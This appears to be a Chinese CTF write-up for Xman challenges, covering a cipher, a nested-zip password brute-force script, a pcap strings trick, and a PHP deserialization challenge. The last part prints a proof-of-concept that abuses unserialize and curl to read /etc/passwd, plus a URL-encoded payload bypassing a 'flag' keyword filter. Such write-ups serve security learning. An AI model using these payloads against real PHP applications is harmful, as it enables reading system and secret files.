0%

Xman WP

common_encrypt

加密算法如下

1
2
3
4
5
6
7
8
9
10
11
def encrypt(data,groupnums):
a=[]
b=[]
section=int(len(data)/groupnums)
for i in range(0,len(data),section):
a.append(data[i:i+section])
for i in range(section):
for j in range(groupnums):
b.append(a[j][i])
cipher=(''.join(chr(ord(b[i])^i) for i in range(len(b))))
return cipher

把groupnums设为1,再加密一次,得到字符串
f_l1angt{3crr3ysptt10n_g1!s}
因为有花括号,怀疑这是栅栏密码,肉眼观察发现k是2
手输flag提交

onion_secret

把jpg后缀改为zip
发现hint的问号用0-10某个数字后是解压密码
解压一层还有一层,于是写脚本

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
import os, sys, zipfile


j = 0
while True:
original_file = str(j) + "onion.zip"
original_file = zipfile.ZipFile(original_file, 'r')
with open(str(j) + 'hint.txt', 'r') as f:
password = f.read()
password = password.split(" ")[2:][0]
position = password.find('?')
for i in range(10):
password = password[:position] + str(i) + password[position + 1:]
print(password)
original_file.setpassword(password.encode())
# original_file = zipfile.ZipFile(original_file)
try:
data = original_file.read("onion.zip")
with open(str(j + 1) + "onion.zip", 'wb') as f1:
f1.write(data)

hint = original_file.read("hint.txt")
with open(str(j + 1) + "hint.txt", 'wb') as f2:
f2.write(hint)
print("hint")
j = j + 1
break
except:
pass

解包到剩下最后一层,手动爆破,获得flag

strange_ssid

strings ctf.pcap | awk ‘{print $1}’| grep -E ‘^[A-Za-z0-9]+$’
得到一串正常字符串
提交字符串报错
添加flag{}标记提交,成功

ezphp

过程分析

打开拿到源码

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
<?php

class Hello {
protected $a;

function test() {
$b = strpos($this->a, 'flag');
if($b) {
die("Bye!");
}
$c = curl_init();
curl_setopt($c, CURLOPT_URL, $this->a);
curl_setopt($c, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($c, CURLOPT_CONNECTTIMEOUT, 5);
echo curl_exec($c);
}

function __destruct(){
$this->test();
}
}

if (isset($_GET["z"])) {
unserialize($_GET["z"]);
} else {
highlight_file(__FILE__);
}

发现是ssrf+反序列化
其中反序列化比较简单,肯定会触发destruct
构造如下poc读取/etc/passwd

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
<?php

class Hello {
protected $a='file:///etc/passwd';

function test() {
$b = strpos($this->a, 'flag');
if($b) {
die("Bye!");
}
$c = curl_init();
curl_setopt($c, CURLOPT_URL, $this->a);
curl_setopt($c, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($c, CURLOPT_CONNECTTIMEOUT, 5);
echo curl_exec($c);
}

function __destruct(){
$this->test();
}
}

// if (isset($_GET["z"])) {
// unserialize($_GET["z"]);
// } else {
// highlight_file(__FILE__);
// }
$x = new Hello();
echo urlencode(serialize($x));

成功读取/etc/passwd

bypass

想要读取flag,发现有一个过滤,即读取文件必须是flagxxx(以flag开头)
虽然可以使用file协议,但是不能直接读取file:///flag
这里使用url编码绕过
将flag进行编码为%2566lag即可绕过检测

payload

?z=O%3A5%3A%22Hello%22%3A1%3A%7Bs%3A4%3A%22%00%2A%00a%22%3Bs%3A14%3A%22file%3A%2F%2F%2F%2566lag%22%3B%7D